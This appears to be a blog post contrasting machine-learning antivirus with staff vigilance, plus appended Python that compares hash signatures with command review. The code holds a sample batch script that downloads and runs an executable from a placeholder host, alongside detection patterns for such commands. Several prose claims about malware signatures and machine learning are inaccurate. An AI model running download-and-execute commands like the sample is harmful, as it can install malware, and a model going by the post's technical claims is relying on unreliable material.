Here we are again: man versus machine. In one corner, we have the machine, capable of reading huge amounts of data in very little time, and in the other, an employee who knows nothing but to do his or her job to the best of their ability.
But against malware, who will fare better?
What is malware?
Malware has entered the vocabulary as the new term for “enemy files.” They are not exactly viruses, in that they have no specific signature. Instead, they carry their own instructions, their own code, which may or may not be intrusive at all, and sometimes (in fact, most of the time) they are not on the computer at all.
What is machine learning?
Machine learning is simple: if the computer sees something do wrong once, it will learn that it is bad from then on. Say, for example, that I am a computer virus and I do something bad. Even though the machine-learning antivirus does not recognize me yet, as soon as I do something bad the antivirus changes its stance against me, and voilà! The antivirus has learned. Machine learning is magnificent, and in every way effective.
Then again, only to a certain point.
What is Employee Vigilance?
Now here comes the other end of the ring: the employee. This is why companies hire tech personnel, sometimes even blue-hat hackers themselves, to prove the antivirus wrong. You see, the antivirus can only see files, and ONLY files. What if the enemy is not in a file but in code instead? An example of this is a simple batch file that downloads malicious code, which in itself is not very bad. However, the download mechanism creates a cascade that causes a denial of service on the computer's CPU, causing it to crash.
There, that is where the tech team and the blue-hats come in.
Since antiviruses cannot discern wrong from right straight away, they see only the inner workings of the file. They see only the file's “signature,” which, in the case of a virus, is the signature of being a virus, be it a Trojan, a worm, or spyware.
An employee sees far more than that. The employee and the blue-hat hacker see the commands themselves, and from there move forward to a new set of instructions, ultimately preventing an attack. In the example given, this would mean saving the computer from a total denial of service.
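As an added illustration of the distinction drawn above (example code written for this page, not anything from the original post): a file-hash signature recognises only the exact file it was built from, while reading the commands, as the post says a person would, still catches a trivially modified copy. The batch script, its URL and its file names are constructed placeholders.

```python
import hashlib
import re
from typing import List, Tuple

# Constructed sample: a batch file of the kind the post describes, which
# downloads a file and then runs it. The URL and file names are placeholders.
ORIGINAL_BAT = (
    "@echo off\r\n"
    "curl -o %TEMP%\\update.exe http://example.invalid/update.exe\r\n"
    "start %TEMP%\\update.exe\r\n"
)
# The same script with one harmless comment line added: the bytes change,
# the behaviour does not.
VARIANT_BAT = ORIGINAL_BAT.replace("@echo off\r\n", "@echo off\r\nrem build 2\r\n")

# A "signature" list as a file-based scanner might keep it: hashes of known-bad files.
KNOWN_BAD_SHA256 = {hashlib.sha256(ORIGINAL_BAT.encode()).hexdigest()}

# Commands that fetch content from the network, and commands that launch a program.
DOWNLOAD_CMDS = re.compile(r"^\s*(curl|powershell)\b", re.I)
LAUNCH_CMDS = re.compile(r"^\s*(start|call)\b", re.I)


def signature_match(script: str) -> bool:
    """Flag the script only if its exact hash is already on the known-bad list."""
    return hashlib.sha256(script.encode()).hexdigest() in KNOWN_BAD_SHA256


def review_commands(script: str) -> List[str]:
    """Read the commands line by line and describe what the script actually does."""
    findings = []
    for line in script.splitlines():
        if DOWNLOAD_CMDS.match(line):
            findings.append("downloads from the network: " + line.strip())
        elif LAUNCH_CMDS.match(line):
            findings.append("launches a program: " + line.strip())
    # The combination the post warns about: fetch something, then run it.
    if any(f.startswith("downloads") for f in findings) and any(f.startswith("launches") for f in findings):
        findings.append("download followed by launch: hold the file for review before it runs")
    return findings


def verdict(script: str) -> Tuple[bool, bool]:
    """Return (signature_hit, command_review_hit) for one script."""
    return signature_match(script), len(review_commands(script)) > 0


if __name__ == "__main__":
    print("original:", verdict(ORIGINAL_BAT))  # signature and review both flag it
    print("variant: ", verdict(VARIANT_BAT))   # only the command review flags it
```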